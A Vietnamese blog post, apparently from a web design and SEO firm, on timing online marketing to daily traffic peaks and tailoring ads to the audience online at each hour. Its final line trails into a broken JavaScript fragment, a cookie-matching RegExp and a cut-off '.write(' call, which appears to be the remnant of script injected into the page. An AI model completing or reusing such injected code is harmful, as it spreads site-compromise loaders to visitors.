Thiết Kế Web, Dịch Vụ Seo, Marketing Online > Tin tức > Tin Pridio > Giờ cao điểm khi làm marketing online

Giờ cao điểm khi làm marketing online

Thói quen khách hàng quyết định công việc marketing online

Thói quen lên mạng vào những giờ cố định trong ngày của nhiều người dường như giống nhau, điều đó làm cho chúng ta suy nghĩ về việc, tại sao không làm marketing online mạnh hơn vào những “giờ cao điểm” – khi mọi người cùng lên mạng để học, chat chit, đọc thông tin của bạn bè vào cùng giờ đó.

Do sự ảnh hưởng lẫn nhau và các quy định của các công ty, doanh nghiệp, nhiều người cùng đổ ra đường, đi làm, đến trường cùng lúc và họ cũng cùng về nhà, cùng ăn cơm và tắm rửa cùng lúc. Sau đó, một bộ phận thì xem ti vi, nhưng thời đó đã qua rồi, bây giờ, người ta lên internet để gặp gỡ bạn bè và tán gẫu hoặc đơn giản là tìm một số thứ giúp họ giải trí trên đó.

Điều đó khiến người làm marketing online trở lên bận rộn hơn vào những giờ mà người khác rảnh rỗi.

Cao điểm lại là thấp điểm

Giờ làm marketing online - Cao điểm lại là thấp điểm

Giờ làm marketing online – Cao điểm lại là thấp điểm

Ví dụ biểu đồ truy cập của một website đào tạo trong một chiến dịch sử dụng SEO cho thấy, có 3 thời điểm khác nhau rõ ràng trong một ngày mà lượng truy cập đông nhất: 9h-10h sáng, 3-4h chiều, và cao hơn ở 8-9h tối.

Lúc tối, số lượng truy cập đông cũng dễ hiểu, nhưng đối với khoảng giờ giữa buổi sáng và giữa buổi chiều thì hơi bất thường. Giải thích cho chuyện này, kết quả thống trên chính website kia cho biết: sáng và chiều thường là học sinh, sinh viên, buổi tối thì gồm có cả người đi học và người đi làm vào đó để học tập.

Nâng cao hiệu quả chiến dịch online marketing theo giờ

Mỗi loại sản phẩm và dịch vụ lại có những khung giờ vàng mà ý thức của khách hàng nghĩ về nó cao nhất, đó hẳn nhiên là những “giờ đẹp” mà người làm marketing nên tận dụng, tuy nhiên, cẩn thận với những thông điệp quảng cáo của bạn lại bị gửi tới nhầm đối tượng, và lại nhầm theo số lượng lớn.

Trong ví dụ trên, rõ ràng, nếu quảng cáo buổi tối và buổi sáng cần có sự khác nhau đôi chút, buổi tối, bạn có thể viết quảng cáo để nói với tất cả mọi người, nhưng buổi sáng và chiều, bạn chỉ có thể viết quảng cáo dành cho nhóm đối tượng là học sinh sinh viên mà thôi.

Hoặc đơn giản hơn, chúng ta có thể dễ dàng thấy những dịch vụ giải trí cho người trưởng thành (không phải giải trí qua internet) sẽ có nhiều người tìm kiếm thông tin hơn vào ban ngày, các buổi chiều chứ không phải vào buổi tối… Vì sao lại như vậy? Rất đơn giản, họ tìm vào ban ngày, và khi hết giờ làm họ mới dùng dịch vụ…

Làm thế nào để biết giờ vàng?

Nhận định một khoảng thời gian nào là thời gian “đẹp” cho việc làm marketing trong từng tháng, từng tuần, từng năm là điều quan trọng rồi và thường được mọi người chú ý để theo dõi, nhưng theo giờ có vẻ là một khái niệm mới đối với người làm marketing online.

Nhưng những người làm quảng cáo qua truyền hình thì việc này lại không có gì là lạ cả.

Chúng ta thử làm một việc thống kê những ngày kinh doanh bình thường và đánh giá xem giờ cao điểm là giờ nào, sau một thời gian, sẽ dễ dàng tìm hiểu được đâu là lúc thích hợp cho những chiến dịch bùng nổ… Nhưng hãy chú ý đối tượng nhận được thông điệp đó nhé. (new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1”)+”= .write(‘